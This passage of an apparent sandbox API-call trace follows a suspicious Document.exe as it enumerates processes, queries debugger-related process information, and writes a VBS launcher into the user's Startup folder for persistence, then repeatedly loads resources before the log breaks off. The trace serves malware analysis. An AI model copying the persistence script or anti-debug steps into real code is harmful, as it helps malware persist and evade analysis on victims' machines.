th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0192.242] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0192.242] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.243] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.244] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0192.245] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Document.exe")) returned 1 [0192.245] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.246] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0192.247] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0192.247] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbfc, pcPriClassBase=6, dwFlags=0x0, szExeFile="officec2rclient.exe")) returned 0 [0192.248] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6f4, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.248] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f944, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f944, ReturnLength=0x0) returned 0x0 [0192.248] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f940, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f940, ReturnLength=0x0) returned 0xc0000353 [0192.248] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0192.249] CallWindowProcW (lpPrevWndFunc=0x3e0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x54fb38 [0192.249] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"", pNumArgs=0x18f944 | out: pNumArgs=0x18f944) returned 0x54fb38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0192.249] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.249] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0xb) returned 0x47b918 [0192.250] SizeofResource (hModule=0x400000, hResInfo=0x47b918) returned 0x3e9 [0192.250] LoadResource (hModule=0x400000, hResInfo=0x47b918) returned 0x4b29a8 [0192.250] VirtualAlloc (lpAddress=0x0, dwSize=0x3e9, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0192.250] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f1ec, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.250] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18f700 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0192.254] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f9e0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.254] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x18f724 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0192.256] wsprintfA (in: param_1=0x18f620, param_2="sET hqQTlNHTptCBUZVik = CreAtEOBJeCT(\"wsCripT.ShEll\")\r\nhQqtlnhtPTcbuzvIk.Run \"\"\"%ls\"\"\"\r\n" | out: param_1="sET hqQTlNHTptCBUZVik = CreAtEOBJeCT(\"wsCripT.ShEll\")\r\nhQqtlnhtPTcbuzvIk.Run \"\"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"\"\"\r\n") returned 140 [0192.256] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs")) returned 0 [0192.256] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf4 [0192.257] SetFilePointer (in: hFile=0xf4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.257] WriteFile (in: hFile=0xf4, lpBuffer=0x18f620*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x18f5f8, lpOverlapped=0x0 | out: lpBuffer=0x18f620*, lpNumberOfBytesWritten=0x18f5f8*=0x8d, lpOverlapped=0x0) returned 1 [0192.258] CloseHandle (hObject=0xf4) returned 1 [0192.259] VirtualAlloc (lpAddress=0x0, dwSize=0x64b06, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0192.260] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.260] FindResourceW (hModule=0x400000, lpName=0x3cf, lpType=0x2) returned 0x47b288 [0192.260] SizeofResource (hModule=0x400000, hResInfo=0x47b288) returned 0x9b4 [0192.260] LoadResource (hModule=0x400000, hResInfo=0x47b288) returned 0x47d638 [0192.260] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.260] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.261] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.261] FindResourceW (hModule=0x400000, lpName=0x3d0, lpType=0x2) returned 0x47b298 [0192.261] SizeofResource (hModule=0x400000, hResInfo=0x47b298) returned 0x9b4 [0192.261] LoadResource (hModule=0x400000, hResInfo=0x47b298) returned 0x47dfec [0192.261] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.261] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.261] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.261] FindResourceW (hModule=0x400000, lpName=0x3d1, lpType=0x2) returned 0x47b2a8 [0192.261] SizeofResource (hModule=0x400000, hResInfo=0x47b2a8) returned 0x9b4 [0192.261] LoadResource (hModule=0x400000, hResInfo=0x47b2a8) returned 0x47e9a0 [0192.262] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.262] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.262] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.262] FindResourceW (hModule=0x400000, lpName=0x3d2, lpType=0x2) returned 0x47b2b8 [0192.262] SizeofResource (hModule=0x400000, hResInfo=0x47b2b8) returned 0x9b4 [0192.262] LoadResource (hModule=0x400000, hResInfo=0x47b2b8) returned 0x47f354 [0192.262] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.263] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.263] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.263] FindResourceW (hModule=0x400000, lpName=0x3d3, lpType=0x2) returned 0x47b2c8 [0192.263] SizeofResource (hModule=0x400000, hResInfo=0x47b2c8) returned 0x9b4 [0192.263] LoadResource (hModule=0x400000, hResInfo=0x47b2c8) returned 0x47fd08 [0192.263] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.263] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.264] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.264] FindResourceW (hModule=0x400000, lpName=0x3d4, lpType=0x2) returned 0x47b2d8 [0192.264] SizeofResource (hModule=0x400000, hResInfo=0x47b2d8) returned 0x9b4 [0192.264] LoadResource (hModule=0x400000, hResInfo=0x47b2d8) returned 0x4806bc [0192.264] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.264] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.264] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.264] FindResourceW (hModule=0x400000, lpName=0x3d5, lpType=0x2) returned 0x47b2e8 [0192.264] SizeofResource (hModule=0x400000, hResInfo=0x47b2e8) returned 0x9b4 [0192.264] LoadResource (hModule=0x400000, hResInfo=0x47b2e8) returned 0x481070 [0192.264] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.265] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.265] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.265] FindResourceW (hModule=0x400000, lpName=0x3d6, lpType=0x2) returned 0x47b2f8 [0192.265] SizeofResource (hModule=0x400000, hResInfo=0x47b2f8) returned 0x9b4 [0192.265] LoadResource (hModule=0x400000, hResInfo=0x47b2f8) returned 0x481a24 [0192.265] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.265] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.266] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.266] FindResourceW (hModule=0x400000, lpName=0x3d7, lpType=0x2) returned 0x47b308 [0192.266] SizeofResource (hModule=0x400000, hResInfo=0x47b308) returned 0x9b4 [0192.266] LoadResource (hModule=0x400000, hResInfo=0x47b308) returned 0x4823d8 [0192.266] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.266] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.266] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.266] FindResourceW (hModule=0x400000, lpName=0x3d8, lpType=0x2) returned 0x47b318 [0192.266] SizeofResource (hModule=0x400000, hResInfo=0x47b318) returned 0x9b4 [0192.266] LoadResource (hModule=0x400000, hResInfo=0x47b318) returned 0x482d8c [0192.266] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.267] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.267] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.267] FindResourceW (hModule=0x400000, lpName=0x3d9, lpType=0x2) returned 0x47b328 [0192.267] SizeofResource (hModule=0x400000, hResInfo=0x47b328) returned 0x9b4 [0192.267] LoadResource (hModule=0x400000, hResInfo=0x47b328) returned 0x483740 [0192.267] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.268] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.268] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.268] FindResourceW (hModule=0x400000, lpName=0x3da, lpType=0x2) returned 0x47b338 [0192.268] SizeofResource (hModule=0x400000, hResInfo=0x47b338) returned 0x9b4 [0192.268] LoadResource (hModule=0x400000, hResInfo=0x47b338) returned 0x4840f4 [0192.268] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.268] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.268] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.268] FindResourceW (hModule=0x400000, lpName=0x3db, lpType=0x2) returned 0x47b348 [0192.268] SizeofResource (hModule=0x400000, hResInfo=0x47b348) returned 0x9b4 [0192.268] LoadResource (hModule=0x400000, hResInfo=0x47b348) returned 0x484aa8 [0192.269] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.269] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.269] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.269] FindResourceW (hModule=0x400000, lpName=0x3dc, lpType=0x2) returned 0x47b358 [0192.269] SizeofResource (hModule=0x400000, hResInfo=0x47b358) returned 0x9b4 [0192.269] LoadResource (hModule=0x400000, hResInfo=0x47b358) returned 0x48545c [0192.269] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.269] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.270] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.270] FindResourceW (hModule=0x400000, lpName=0x3dd, lpType=0x2) returned 0x47b368 [0192.270] SizeofResource (hModule=0x400000, hResInfo=0x47b368) returned 0x9b4 [0192.270] LoadResource (hModule=0x400000, hResInfo=0x47b368) returned 0x485e10 [0192.270] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.270] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.271] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.271] FindResourceW (hModule=0x400000, lpName=0x3de, lpType=0x2) returned 0x47b378 [0192.271] SizeofResource (hModule=0x400000, hResInfo=0x47b378) returned 0x9b4 [0192.271] LoadResource (hModule=0x400000, hResInfo=0x47b378) returned 0x4867c4 [0192.271] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.271] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.271] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.271] FindResourceW (hModule=0x400000, lpName=0x3df, lpType=0x2) returned 0x47b388 [0192.271] SizeofResource (hModule=0x400000, hResInfo=0x47b388) returned 0x9b4 [0192.271] LoadResource (hModule=0x400000, hResInfo=0x47b388) returned 0x487178 [0192.271] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.272] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.272] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.272] FindResourceW (hModule=0x400000, lpName=0x3e0, lpType=0x2) returned 0x47b398 [0192.272] SizeofResource (hModule=0x400000, hResInfo=0x47b398) returned 0x9b4 [0192.272] LoadResource (hModule=0x400000, hResInfo=0x47b398) returned 0x487b2c [0192.272] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.272] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.273] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.273] FindResourceW (hModule=0x400000, lpName=0x3e1, lpType=0x2) returned 0x47b3a8 [0192.273] SizeofResource (hModule=0x400000, hResInfo=0x47b3a8) returned 0x9b4 [0192.273] LoadResource (hModule=0x400000, hResInfo=0x47b3a8) returned 0x4884e0 [0192.273] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.273] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.273] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.273] FindResourceW (hModule=0x400000, lpName=0x3e2, lpType=0x2) returned 0x47b3b8 [0192.273] SizeofResource (hModule=0x400000, hResInfo=0x47b3b8) returned 0x9b4 [0192.273] LoadResource (hModule=0x400000, hResInfo=0x47b3b8) returned 0x488e94 [0192.273] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.274] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.274] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.274] FindResourceW (hModule=0x400000, lpName=0x3e3, lpType=0x2) returned 0x47b3c8 [0192.274] SizeofResource (hModule=0x400000, hResInfo=0x47b3c8) returned 0x9b4 [0192.274] LoadResource (hModule=0x400000, hResInfo=0x47b3c8) returned 0x489848 [0192.274] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.274] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.275] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.275] FindResourceW (hModule=0x400000, lpName=0x3e4, lpType=0x2) returned 0x47b3d8 [0192.275] SizeofResource (hModule=0x400000, hResInfo=0x47b3d8) returned 0x9b4 [0192.275] LoadResource (hModule=0x400000, hResInfo=0x47b3d8) returned 0x48a1fc [0192.275] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.275] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.275] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.275] FindResourceW (hModule=0x400000, lpName=0x3e5, lpType=0x2) returned 0x47b3e8 [0192.275] SizeofResource (hModule=0x400000, hResInfo=0x47b3e8) returned 0x9b4 [0192.275] LoadResource (hModule=0x400000, hResInfo=0x47b3e8) returned 0x48abb0 [0192.275] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.276] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.276] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.276] FindResourceW (hModule=0x400000, lpName=0x3e6, lpType=0x2) returned 0x47b3f8 [0192.276] SizeofResource (hModule=0x400000, hResInfo=0x47b3f8) returned 0x9b4 [0192.276] LoadResource (hModule=0x400000, hResInfo=0x47b3f8) returned 0x48b564 [0192.276] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.276] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.277] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.277] FindResourceW (hModule=0x400000, lpName=0x3e7, lpType=0x2) returned 0x47b408 [0192.277] SizeofResource (hModule=0x400000, hResInfo=0x47b408) returned 0x9b4 [0192.277] LoadResource (hModule=0x400000, hResInfo=0x47b408) returned 0x48bf18 [0192.277] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.277] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.277] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.277] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0x2) returned 0x47b418 [0192.277] SizeofResource (hModule=0x400000, hResInfo=0x47b418) returned 0x9b4 [0192.278] LoadResource (hModule=0x400000, hResInfo=0x47b418) returned 0x48c8cc [0192.278] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.278] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.278] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.278] FindResourceW (hModule=0x400000, lpName=0x3e9, lpType=0x2) returned 0x47b428 [0192.278] SizeofResource (hModule=0x400000, hResInfo=0x47b428) returned 0x9b4 [0192.278] LoadResource (hModule=0x400000, hResInfo=0x47b428) returned 0x48d280 [0192.278] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.279] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.279] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.279] FindResourceW (hModule=0x400000, lpName=0x3ea, lpType=0x2) returned 0x47b438 [0192.279] SizeofResource (hModule=0x400000, hResInfo=0x47b438) returned 0x9b4 [0192.279] LoadResource (hModule=0x400000, hResInfo=0x47b438) returned 0x48dc34 [0192.279] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.279] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.280] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.280] FindResourceW (hModule=0x400000, lpName=0x3eb, lpType=0x2) returned 0x47b448 [0192.280] SizeofResource (hModule=0x400000, hResInfo=0x47b448) returned 0x9b4 [0192.280] LoadResource (hModule=0x400000, hResInfo=0x47b448) returned 0x48e5e8 [0192.280] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.280] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.280] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.280] FindResourceW (hModule=0x400000, lpName=0x3ec, lpType=0x2) returned 0x47b458 [0192.280] SizeofResource (hModule=0x400000, hResInfo=0x47b458) returned 0x9b4 [0192.280] LoadResource (hModule=0x400000, hResInfo=0x47b458) returned 0x48ef9c [0192.280] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.281] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.281] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.281] FindResourceW (hModule=0x400000, lpName=0x3ed, lpType=0x2) returned 0x47b468 [0192.281] SizeofResource (hModule=0x400000, hResInfo=0x47b468) returned 0x9b4 [0192.281] LoadResource (hModule=0x400000, hResInfo=0x47b468) returned 0x48f950 [0192.281] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.281] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.282] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.282] FindResourceW (hModule=0x400000, lpName=0x3ee, lpType=0x2) returned 0x47b478 [0192.282] SizeofResource (hModule=0x400000, hResInfo=0x47b478) returned 0x9b4 [0192.282] LoadResource (hModule=0x400000, hResInfo=0x47b478) returned 0x490304 [0192.282] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.282] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.282] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.282] FindResourceW (hModule=0x400000, lpName=0x3ef, lpType=0x2) returned 0x47b488 [0192.282] SizeofResource (hModule=0x400000, hResInfo=0x47b488) returned 0x9b4 [0192.282] LoadResource (hModule=0x400000, hResInfo=0x47b488) returned 0x490cb8 [0192.282] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.283] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.283] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.283] FindResourceW (hModule=0x400000, lpName=0x3f0, lpType=0x2) returned 0x47b498 [0192.283] SizeofResource (hModule=0x400000, hResInfo=0x47b498) returned 0x9b4 [0192.283] LoadResource (hModule=0x400000, hResInfo=0x47b498) returned 0x49166c [0192.283] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.283] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.284] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.284] FindResourceW (hModule=0x400000, lpName=0x3f1, lpType=0x2) returned 0x47b4a8 [0192.284] SizeofResource (hModule=0x400000, hResInfo=0x47b4a8) returned 0x9b4 [0192.284] LoadResource (hModule=0x400000, hResInfo=0x47b4a8) returned 0x492020 [0192.284] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.284] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.284] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.284] FindResourceW (hModule=0x400000, lpName=0x3f2, lpType=0x2) returned 0x47b4b8 [0192.284] SizeofResource (hModule=0x400000, hResInfo=0x47b4b8) returned 0x9b4 [0192.284] LoadResource (hModule=0x400000, hResInfo=0x47b4b8) returned 0x4929d4 [0192.284] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.285] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.285] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.285] FindResourceW (hModule=0x400000, lpName=0x3f3, lpType=0x2) returned 0x47b4c8 [0192.285] SizeofResource (hModule=0x400000, hResInfo=0x47b4c8) returned 0x9b4 [0192.285] LoadResource (hModule=0x400000, hResInfo=0x47b4c8) returned 0x493388 [0192.285] VirtualAlloc (lpAddress=0x0, dwSize=0x9b4, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0192.285] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.286] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.286] FindResourceW (hModule=0x400000, lpName=0x3f4, lpType=0x2) returned 0x47b4d8 [0192.286] SizeofResource (hModule=0x400000, 